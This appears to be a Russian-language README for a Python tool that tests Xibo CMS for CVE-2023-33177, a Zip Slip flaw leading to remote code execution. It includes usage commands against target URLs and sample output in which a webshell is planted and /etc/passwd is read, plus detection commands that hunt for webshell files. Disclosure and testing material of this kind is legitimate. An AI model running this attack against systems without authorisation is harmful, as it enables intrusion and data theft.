
Xibo CMS CVE-2023-33177 漏洞测试器
Автоматизированный инструмент тестирования безопасности для CVE-2023-33177 — уязвимость Zip Slip Path Traversal в Xibo CMS, приводящая к удаленному выполнению кода (RCE).
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования. Используйте только в системах, которыми вы владеете или на которые имеете явное разрешение на тестирование. Несанкционированное тестирование незаконно и неэтично.
Версии Xibo CMS 1.8.0–2.3.16 и 3.0.0–3.3.4 уязвимы к атаке path traversal через функцию импорта макетов. Этот инструмент безопасно проверяет, уязвим ли ваш экземпляр Xibo, пытаясь записать безвредный тестовый файл.
## Клонирование репозитория
git clone [email protected]/kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester
## Установка зависимостей
pip install -r requirements.txt## -CVE-2023-33177-
Базовая структура команды
python test_cve_2023_33177.py <URL> <имя_пользователя> <пароль>
## Локальный экземпляр разработки
python test_cve_2023_33177.py http://localhost/xibo admin password123
## Удаленный продуктивный с HTTPS
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!
## Пользовательский порт и путь
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin mypassword
## Без завершающего слеша (скрипт обрабатывает)
python test_cve_2023_33177.py https://example.com/xibo admin pass
[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test
[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[!] VULNERABLE! Webshell accessible at: http://localhost/security_test.php
[+] Successfully read /etc/passwd
[*] Output preview: VULN_TEST_root:x:0:0:root:/root:/bin/bash...
[!] Website IS VULNERABLE to CVE-2023-33177!
[!] Remediation: Update Xibo CMS to version 3.3.5+ or 2.3.17+
[!] Delete the test file: security_test.php
[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test
[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[-] Webshell not found (HTTP 404)
[+] Website appears NOT vulnerable (or path differs)
## Загрузка последней версии
wget https://github.com/xibosignage/xibo-cms/releases/latest
## Следуйте инструкциям по обновлению
## https://xibo.org.uk/manual/en/upgrade.html
## Поиск недавно измененных PHP-файлов в корне веб-сервера
find /var/www/html -name "*.php" -mtime -7 -type f
## Проверка подозрительных файлов
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"
## Просмотр журналов доступа на предмет несанкционированных импортов
grep "layout/import" /var/log/apache2/access.log
Изменить все пароли пользователей CMS
Сменить API-ключи и токены
Проверить и удалить неавторизованные учетные записи
`
📋 Требования
Python 3.6 или выше
Библиотека requests (установка через pip)
Действительные учетные данные Xibo CMS (требуется аутентификация)
Сетевой доступ к целевому экземпляру Xibo
Форкните репозиторий
Создайте ветку функции: git checkout -b feature/amazing-feature
Зафиксируйте изменения: git commit -m 'Add amazing feature'
Отправьте изменения: git push origin feature/amazing-feature
Откройте Pull Request
Требования к вкладу
Код должен соответствовать стандартам PEP 8
Тестирование должно оставаться безопасным
Документация должна быть обновлена
Запрещено тестирование на неавторизованных целях
Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.
⚖️ Правовое и этическое использование
Используя этот инструмент, вы соглашаетесь:
Тестировать только системы, которыми вы владеете или на которые имеете явное письменное разрешение
Соблюдать все местные, государственные и федеральные законы
Не использовать этот инструмент для злонамеренных целей
Ответственно сообщать об уязвимостях поставщикам
Нести полную ответственность за свои действия
CVE-2023-33177 NVD Entry
Xibo Security Advisories
Zip Slip Vulnerability Details
OWASP Path Traversal Guide
Вопросы: GitHub Issues
Отчеты о безопасности: Пожалуйста, сообщайте ответственно через приватное сообщение об уязвимости на GitHub
Вопросы: Откройте обсуждение на GitHub
Если этот инструмент помог вам, пожалуйста, поставьте звезду репозиторию!